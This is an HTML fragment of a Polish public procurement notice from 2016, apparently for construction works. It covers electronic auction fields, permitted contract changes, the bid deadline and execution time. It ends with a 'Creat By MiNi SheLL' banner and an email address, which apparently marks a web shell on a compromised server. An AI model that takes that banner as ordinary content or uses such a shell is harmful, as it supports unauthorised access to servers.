               Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
               <br />
               <br />
               Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
               <br />
               nie
               <br />
               Informacje dodatkowe:
               <br />
               <br />
               <b>IV.4) Licytacja elektroniczna</b>
               <br />
               Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
               <br />
               <div style="padding-left: 20px" />
               Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
               <br />
               <div style="padding-left: 20px" />
               Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
               <br />
               <div style="padding-left: 20px" />
               Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:
               <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table>
                     <tr>
                        <td>etap nr</td>
                        <td>czas trwania etapu</td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <br />
                  Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
               </div>
               Termin otwarcia licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               Termin i warunki zamknięcia licytacji elektronicznej:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Wymagania dotyczące zabezpieczenia należytego wykonania umowy:
               <br />
               <div style="padding-left: 20px" />
               <br />
               Informacje dodatkowe:
               <br />
               <div style="padding-left: 20px" />
               <b>IV.5) ZMIANA UMOWY</b>
               <br />
               <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
               tak
               <br />
               Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
               <br />
               Zamawiający przewiduje istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Wykonawca został wybrany do realizacji zamówienia w przypadku:
    a) zmiany stawki podatku VAT,
    b) wystąpienia warunków atmosferycznych, które uniemożliwiają lub znacznie utrudniają wykonanie robót,
    c) wyjątkowo trudnych warunków gruntowo-wodnych, które nie zostały przewidziane w dokumentacji,
    d) wystąpienia niezgodności w zakresie terenu robót wynikającego z pomiarów geodezyjnych,
    e) konieczności uzyskania dodatkowych uzgodnień lub pozwoleń,
    f) gdy wykonanie robót nie będzie możliwe ze względów technologicznych,
    g) opóźnienia w uzyskaniu przez Zamawiającego pozwolenia na budowę/ upływu terminu na wniesienie sprzeciwu przez właściwy organ.
               <br />
               <b>IV.6) INFORMACJE ADMINISTRACYJNE</b>
               <br />
               <br />
               <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym</b>
               <i>(jeżeli dotyczy):</i>
               <br />
               <br />
               <b>Środki służące ochronie informacji o charakterze poufnym</b>
               <br />
               <br />
               <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu:</b>
               <br />
               Data: 14/09/2016, godzina: 10:00,
               <br />
               Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
               <br />
               nie
               <br />
               Wskazać powody:
               <br />
               <br />
               Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
               <br />
               &gt;
              Polski
               <br />
               <b>IV.6.3) Termin związania ofertą:</b>
               okres w dniach: 30 (od ostatecznego terminu składania ofert)
               <br />
               <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
               tak
               <br />
               <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
               nie
               <br />
               <b>IV.6.6) Informacje dodatkowe:</b>
               <br />
            </div>
         </div>
         <div style="text-align: center" class="headerLarge_xforms">
            <u>ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</u>
         </div>
         <div>
            <b>Część nr:</b>
              
            <b>Nazwa:</b>
            <br />
            <div style="padding-left: 20px">
               <b>1) Krótki opis przedmiotu zamówienia</b>
               <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i>
               <b>a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
               <br />
               <b>2) Wspólny Słownik Zamówień (CPV):</b>
               <br />
               <b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b>
               <br />
               Wartość bez VAT:
               <br />
               Waluta:
               <br />
               <div style="padding-left: 20px">
                  <br />
                  <b>4) Czas trwania lub termin wykonania:</b>
                  okres w dniach: 56
                  <br />
                  <b>5) Kryteria oceny ofert:</b>
                  <table style="padding-left: 20px">
                     <tr>
                        <td>
                           <i>Kryteria</i>
                        </td>
                        <td>
                           <i>Znaczenie</i>
                        </td>
                     </tr>
                     <tr>
                        <td />
                        <td />
                     </tr>
                  </table>
                  <b>6) INFORMACJE DODATKOWE:</b>
                  <br />
               </div>
            </div>
            <br />
         </div>
      </div>
   

Creat By MiNi SheLL
Email: jattceo@gmail.com